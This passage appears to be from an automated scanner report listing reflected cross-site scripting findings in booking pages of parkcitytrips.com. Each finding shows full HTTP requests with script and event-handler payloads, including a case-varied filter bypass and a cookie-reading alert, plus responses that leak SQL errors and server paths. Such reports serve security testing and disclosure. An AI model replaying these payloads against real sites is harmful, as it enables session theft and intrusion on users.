This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /booking_results.php?cloneID=41&rooms=198edd"><script>alert(1)</script>87ab84a1024&nights=1&sDay=26&sMonth=10&sYear=2010&start-date=02%2F10%2F2011&end-date=02%2F13%2F2011&lodgingID=103&group_id=982 HTTP/1.1
Host: parkcitytrips.com
Proxy-Connection: keep-alive
Referer: http://parkcitytrips.com/redirect_booking.php?cloneID=41&group_id=982&rooms=1&nights=1&sDay=26&sMonth=10&sYear=2010&start-date=02%2F10%2F2011&end-date=02%2F13%2F2011&lodgingID=103&Submit.x=58&Submit.y=29
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SERVERID=i-f3d4a39a

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 22:10:34 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=efglj1ecb54grv07dnsljqpm55; path=/
Connection: close
Content-Length: 373553


                   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
                   <html><head>
                   <meta http-equiv="Content-Type" content="text/html; charset=iso-885
...[SNIP]...
<a href="http://parkcitytrips.com/redirect.php?group_id=982&cloneID=41&nights=3&rooms=198edd"><script>alert(1)</script>87ab84a1024&adults=1&kids=0&catID=103&sDate=2010-10-26&eDate=2010-10-29&eventID=1427&clickSourceID=11&linkTypeID=5&interstitial=show" target="_blank" _gaq.push(['jrs_analytics._trackEvent','Map Page','Click','Li
...[SNIP]...

2.9. http://parkcitytrips.com/booking_results.php [sDay parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://parkcitytrips.com
Path:   /booking_results.php

Issue detail

The value of the sDay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91a01"><script>alert(1)</script>f6886e945ff was submitted in the sDay parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /booking_results.php?cloneID=41&rooms=1&nights=1&sDay=2691a01"><script>alert(1)</script>f6886e945ff&sMonth=10&sYear=2010&start-date=02%2F10%2F2011&end-date=02%2F13%2F2011&lodgingID=103&group_id=982 HTTP/1.1
Host: parkcitytrips.com
Proxy-Connection: keep-alive
Referer: http://parkcitytrips.com/redirect_booking.php?cloneID=41&group_id=982&rooms=1&nights=1&sDay=26&sMonth=10&sYear=2010&start-date=02%2F10%2F2011&end-date=02%2F13%2F2011&lodgingID=103&Submit.x=58&Submit.y=29
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SERVERID=i-f3d4a39a

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 22:11:10 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=fhv1j54mds4avqhecnmvks50f2; path=/
Connection: close
Content-Length: 48793


<br />
<b>Notice</b>: A non well formed numeric value encountered in <b>/mnt/book_direct/releases/20110209220827/v002/dbase/classes/dateClasses.php</b> on line <b>494</b><br />
<br />
<b>Notice</b>
...[SNIP]...
<input type="hidden" name="sDay" id="sDay" value="2691a01"><script>alert(1)</script>f6886e945ff" />
...[SNIP]...

2.10. http://parkcitytrips.com/booking_results.php [sMonth parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://parkcitytrips.com
Path:   /booking_results.php

Issue detail

The value of the sMonth request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2cf03"><script>alert(1)</script>2d2be470778 was submitted in the sMonth parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /booking_results.php?cloneID=41&rooms=1&nights=1&sDay=26&sMonth=102cf03"><script>alert(1)</script>2d2be470778&sYear=2010&start-date=02%2F10%2F2011&end-date=02%2F13%2F2011&lodgingID=103&group_id=982 HTTP/1.1
Host: parkcitytrips.com
Proxy-Connection: keep-alive
Referer: http://parkcitytrips.com/redirect_booking.php?cloneID=41&group_id=982&rooms=1&nights=1&sDay=26&sMonth=10&sYear=2010&start-date=02%2F10%2F2011&end-date=02%2F13%2F2011&lodgingID=103&Submit.x=58&Submit.y=29
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SERVERID=i-f3d4a39a

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 22:11:12 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=tctt2enr61k0hvtmloskt3qij7; path=/
Connection: close
Content-Length: 48793


<br />
<b>Notice</b>: A non well formed numeric value encountered in <b>/mnt/book_direct/releases/20110209220827/v002/dbase/classes/dateClasses.php</b> on line <b>494</b><br />
<br />
<b>Notice</b>
...[SNIP]...
<input type="hidden" name="sMonth" id="sMonth" value="102cf03"><script>alert(1)</script>2d2be470778" />
...[SNIP]...

2.11. http://parkcitytrips.com/booking_results.php [sYear parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://parkcitytrips.com
Path:   /booking_results.php

Issue detail

The value of the sYear request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ccbef"><script>alert(1)</script>a3b02212275 was submitted in the sYear parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /booking_results.php?cloneID=41&rooms=1&nights=1&sDay=26&sMonth=10&sYear=2010ccbef"><script>alert(1)</script>a3b02212275&start-date=02%2F10%2F2011&end-date=02%2F13%2F2011&lodgingID=103&group_id=982 HTTP/1.1
Host: parkcitytrips.com
Proxy-Connection: keep-alive
Referer: http://parkcitytrips.com/redirect_booking.php?cloneID=41&group_id=982&rooms=1&nights=1&sDay=26&sMonth=10&sYear=2010&start-date=02%2F10%2F2011&end-date=02%2F13%2F2011&lodgingID=103&Submit.x=58&Submit.y=29
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SERVERID=i-f3d4a39a

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 22:11:13 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=1tsfshbsa708trdin1p1lfbki1; path=/
Connection: close
Content-Length: 48971


<br />
<b>Notice</b>: A non well formed numeric value encountered in <b>/mnt/book_direct/releases/20110209220827/v002/dbase/classes/dateClasses.php</b> on line <b>494</b><br />
<br />
<b>Notice</b>
...[SNIP]...
<input type="hidden" name="sYear" id="sYear" value="2010ccbef"><script>alert(1)</script>a3b02212275" />
...[SNIP]...

2.12. http://parkcitytrips.com/redirect.php [cloneID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://parkcitytrips.com
Path:   /redirect.php

Issue detail

The value of the cloneID request parameter is copied into the HTML document as plain text between tags. The payload 7fcd2<script>alert(1)</script>e7598944127 was submitted in the cloneID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /redirect.php?group_id=982&cloneID=417fcd2<script>alert(1)</script>e7598944127&catID=103&sDate=2010-10-26&eDate=2010-10-29&eventID=1436&linkTypeID=11&clickSourceID=4 HTTP/1.1
Host: parkcitytrips.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SERVERID=i-f3d4a39a; __utmv=252597768.|2=Results%20Page=parkcitytrips.com=1,; __utmz=252597768.1297289442.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=rso1kpo756scrthfhm9htcvdf3; __utma=252597768.924705233.1297289442.1297289442.1297289442.1; __utmc=252597768; __utmb=252597768.4.10.1297289442;

Response

HTTP/1.0 200 OK
Date: Wed, 09 Feb 2011 22:49:41 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 307
Content-Type: text/html; charset=UTF-8
Connection: close

Error: A problem was encountered while executing the query <i>SELECT * FROM clones WHERE id = 417fcd2<script>alert(1)</script>e7598944127</i> You have an error in your SQL syntax; check the manual tha
...[SNIP]...

2.13. http://parkcitytrips.com/redirect.php [eventID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://parkcitytrips.com
Path:   /redirect.php

Issue detail

The value of the eventID request parameter is copied into the HTML document as plain text between tags. The payload 1103d<script>alert(1)</script>649e9de5cc0 was submitted in the eventID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /redirect.php?group_id=982&cloneID=41&catID=103&eventID=14361103d<script>alert(1)</script>649e9de5cc0&linkTypeID=2&clickSourceID=4 HTTP/1.1
Host: parkcitytrips.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SERVERID=i-f3d4a39a; __utmv=252597768.|2=Results%20Page=parkcitytrips.com=1,; __utmz=252597768.1297289442.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=rso1kpo756scrthfhm9htcvdf3; __utma=252597768.924705233.1297289442.1297289442.1297289442.1; __utmc=252597768; __utmb=252597768.4.10.1297289442;

Response

HTTP/1.0 200 OK
Date: Wed, 09 Feb 2011 22:53:11 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 619
Content-Type: text/html; charset=UTF-8
Connection: close

Error: A problem was encountered while executing the query <i>SELECT el.id, el.eventID, lt.id as 'linkTypeID', lt.description ,lu.id as 'linkUrlID', lu.urlString, el.partnerID, el.fileName, el.inactiveDate, lt.multiplesOK FROM event_links el INNER JOIN linkTypes lt ON lt.id = el.linkTypesID INNER JOIN linkUrls lu ON lu.id = el.linkUrlID WHERE el.eventID =14361103d<script>alert(1)</script>649e9de5cc0 AND el.linkTypesID = 2</i>
...[SNIP]...

2.14. http://parkcitytrips.com/redirect.php [linkTypeID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://parkcitytrips.com
Path:   /redirect.php

Issue detail

The value of the linkTypeID request parameter is copied into the HTML document as plain text between tags. The payload 770df<ScRiPt>alert(1)</ScRiPt>8d6ad04a6f9 was submitted in the linkTypeID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /redirect.php?group_id=982&cloneID=41&nights=3&rooms=1&adults=1&kids=0&catID=103&sDate=2010-10-26&eDate=2010-10-29&eventID=1436&linkTypeID=5770df<ScRiPt>alert(1)</ScRiPt>8d6ad04a6f9&clickSourceID=4 HTTP/1.1
Host: parkcitytrips.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SERVERID=i-f3d4a39a; __utmv=252597768.|2=Results%20Page=parkcitytrips.com=1,; __utmz=252597768.1297289442.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=rso1kpo756scrthfhm9htcvdf3; __utma=252597768.924705233.1297289442.1297289442.1297289442.1; __utmc=252597768; __utmb=252597768.4.10.1297289442;

Response

HTTP/1.0 200 OK
Date: Wed, 09 Feb 2011 23:10:54 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 310
Content-Type: text/html; charset=UTF-8
Connection: close

Error: A problem was encountered while executing the query <i>SELECT * FROM linkTypes WHERE id= 5770df<ScRiPt>alert(1)</ScRiPt>8d6ad04a6f9</i> You have an error in your SQL syntax; check the manual
...[SNIP]...

2.15. http://parkcitytrips.com/redirect.php [linkTypeID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://parkcitytrips.com
Path:   /redirect.php

Issue detail

The value of the linkTypeID request parameter is copied into the HTML document as plain text between tags. The payload 74ab8<img%20src%3da%20onerror%3dalert(1)>0880d0f9171 was submitted in the linkTypeID parameter. This input was echoed as 74ab8<img src=a onerror=alert(1)>0880d0f9171 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /redirect.php?group_id=982&cloneID=41&catID=103&eventID=1436&linkTypeID=274ab8<img%20src%3da%20onerror%3dalert(1)>0880d0f9171&clickSourceID=4 HTTP/1.1
Host: parkcitytrips.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SERVERID=i-f3d4a39a; __utmv=252597768.|2=Results%20Page=parkcitytrips.com=1,; __utmz=252597768.1297289442.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=rso1kpo756scrthfhm9htcvdf3; __utma=252597768.924705233.1297289442.1297289442.1297289442.1; __utmc=252597768; __utmb=252597768.4.10.1297289442;

Response

HTTP/1.0 200 OK
Date: Wed, 09 Feb 2011 22:56:03 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 328
Content-Type: text/html; charset=UTF-8
Connection: close

Error: A problem was encountered while executing the query <i>SELECT * FROM linkTypes WHERE id= 274ab8<img src=a onerror=alert(1)>0880d0f9171</i> You have an error in your SQL syntax; check the manu
...[SNIP]...

2.16. http://parkcitytrips.com/redirect.php [linkTypeID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://parkcitytrips.com
Path:   /redirect.php

Issue detail

The value of the linkTypeID request parameter is copied into the HTML document as plain text between tags. The payload 72ddb<script>alert(1)</script>c09cded38b0 was submitted in the linkTypeID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /redirect.php?group_id=982&cloneID=41&catID=103&sDate=2010-10-26&eDate=2010-10-29&eventID=1436&linkTypeID=1172ddb<script>alert(1)</script>c09cded38b0&clickSourceID=4 HTTP/1.1
Host: parkcitytrips.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SERVERID=i-f3d4a39a; __utmv=252597768.|2=Results%20Page=parkcitytrips.com=1,; __utmz=252597768.1297289442.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=rso1kpo756scrthfhm9htcvdf3; __utma=252597768.924705233.1297289442.1297289442.1297289442.1; __utmc=252597768; __utmb=252597768.4.10.1297289442;

Response

HTTP/1.0 200 OK
Date: Wed, 09 Feb 2011 23:02:23 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 311
Content-Type: text/html; charset=UTF-8
Connection: close

Error: A problem was encountered while executing the query <i>SELECT * FROM linkTypes WHERE id= 1172ddb<script>alert(1)</script>c09cded38b0</i> You have an error in your SQL syntax; check the manual
...[SNIP]...

2.17. http://parkcitytrips.com/redirect_booking.php [Submit.x parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://parkcitytrips.com
Path:   /redirect_booking.php

Issue detail

The value of the Submit.x request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26765"><script>alert(1)</script>151b4bc609a was submitted in the Submit.x parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /redirect_booking.php?cloneID=41&group_id=982&rooms=1&nights=1&sDay=26&sMonth=10&sYear=2010&start-date=02%2F10%2F2011&end-date=02%2F13%2F2011&lodgingID=103&Submit.x=5826765"><script>alert(1)</script>151b4bc609a&Submit.y=29 HTTP/1.1
Host: parkcitytrips.com
Proxy-Connection: keep-alive
Referer: http://www.parkcityinfo.com/visitors/lodging-hotels/?gclid=CNLClayJ_KYCFUGo4AodpWQ8Gg&89fd0%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E130ae64f81c=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SERVERID=i-f3d4a39a

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 22:09:26 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.4
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 3053


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
<a href="booking_results.php?cloneID=41&group_id=982&rooms=1&nights=1&sDay=26&sMonth=10&sYear=2010&start-date=02%2F10%2F2011&end-date=02%2F13%2F2011&lodgingID=103&Submit.x=5826765"><script>alert(1)</script>151b4bc609a&Submit.y=29">
...[SNIP]...

2.18. http://parkcitytrips.com/redirect_booking.php [Submit.x parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://parkcitytrips.com
Path:   /redirect_booking.php

Issue detail

The value of the Submit.x request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7b438"-alert(1)-"6f5effdfc8a was submitted in the Submit.x parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /redirect_booking.php?cloneID=41&group_id=982&rooms=1&nights=1&sDay=26&sMonth=10&sYear=2010&start-date=02%2F10%2F2011&end-date=02%2F13%2F2011&lodgingID=103&Submit.x=587b438"-alert(1)-"6f5effdfc8a&Submit.y=29 HTTP/1.1
Host: parkcitytrips.com
Proxy-Connection: keep-alive
Referer: http://www.parkcityinfo.com/visitors/lodging-hotels/?gclid=CNLClayJ_KYCFUGo4AodpWQ8Gg&89fd0%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E130ae64f81c=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SERVERID=i-f3d4a39a

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 22:09:27 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.4
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 3023


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
}
   else {
       window.location = "booking_results.php?cloneID=41&group_id=982&rooms=1&nights=1&sDay=26&sMonth=10&sYear=2010&start-date=02%2F10%2F2011&end-date=02%2F13%2F2011&lodgingID=103&Submit.x=587b438"-alert(1)-"6f5effdfc8a&Submit.y=29";
   
   }
}

</script>
...[SNIP]...

2.19. http://parkcitytrips.com/redirect_booking.php [Submit.y parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://parkcitytrips.com
Path:   /redirect_booking.php

Issue detail

The value of the Submit.y request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3c609"-alert(1)-"0a6cd2dee1d was submitted in the Submit.y parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /redirect_booking.php?cloneID=41&group_id=982&rooms=1&nights=1&sDay=26&sMonth=10&sYear=2010&start-date=02%2F10%2F2011&end-date=02%2F13%2F2011&lodgingID=103&Submit.x=58&Submit.y=293c609"-alert(1)-"0a6cd2dee1d HTTP/1.1
Host: parkcitytrips.com
Proxy-Connection: keep-alive
Referer: http://www.parkcityinfo.com/visitors/lodging-hotels/?gclid=CNLClayJ_KYCFUGo4AodpWQ8Gg&89fd0%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E130ae64f81c=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SERVERID=i-f3d4a39a

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 22:09:27 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.4
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 3023


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
{
       window.location = "booking_results.php?cloneID=41&group_id=982&rooms=1&nights=1&sDay=26&sMonth=10&sYear=2010&start-date=02%2F10%2F2011&end-date=02%2F13%2F2011&lodgingID=103&Submit.x=58&Submit.y=293c609"-alert(1)-"0a6cd2dee1d";
   
   }
}

</script>
...[SNIP]...

2.20. http://parkcitytrips.com/redirect_booking.php [Submit.y parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://parkcitytrips.com
Path:   /redirect_booking.php

Issue detail

The value of the Submit.y request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 16f43"><script>alert(1)</script>e32cbbfbe98 was submitted in the Submit.y parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /redirect_booking.php?cloneID=41&group_id=982&rooms=1&nights=1&sDay=26&sMonth=10&sYear=2010&start-date=02%2F10%2F2011&end-date=02%2F13%2F2011&lodgingID=103&Submit.x=58&Submit.y=2916f43"><script>alert(1)</script>e32cbbfbe98 HTTP/1.1
Host: parkcitytrips.com
Proxy-Connection: keep-alive
Referer: http://www.parkcityinfo.com/visitors/lodging-hotels/?gclid=CNLClayJ_KYCFUGo4AodpWQ8Gg&89fd0%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E130ae64f81c=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SERVERID=i-f3d4a39a

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 22:09:27 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.4
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 3053


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
<a href="booking_results.php?cloneID=41&group_id=982&rooms=1&nights=1&sDay=26&sMonth=10&sYear=2010&start-date=02%2F10%2F2011&end-date=02%2F13%2F2011&lodgingID=103&Submit.x=58&Submit.y=2916f43"><script>alert(1)</script>e32cbbfbe98">
...[SNIP]...

2.21. http://parkcitytrips.com/redirect_booking.php [cloneID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://parkcitytrips.com
Path:   /redirect_booking.php

Issue detail

The value of the cloneID request parameter is copied into the HTML document as plain text between tags. The payload c7e2a<script>alert(1)</script>8f741e95d30 was submitted in the cloneID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /redirect_booking.php?cloneID=41c7e2a<script>alert(1)</script>8f741e95d30&group_id=982&rooms=1&nights=1&sDay=26&sMonth=10&sYear=2010&start-date=02%2F10%2F2011&end-date=02%2F13%2F2011&lodgingID=103&Submit.x=58&Submit.y=29 HTTP/1.1
Host: parkcitytrips.com
Proxy-Connection: keep-alive
Referer: http://www.parkcityinfo.com/visitors/lodging-hotels/?gclid=CNLClayJ_KYCFUGo4AodpWQ8Gg&89fd0%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E130ae64f81c=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SERVERID=i-f3d4a39a

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 22:09:24 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.4
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 334

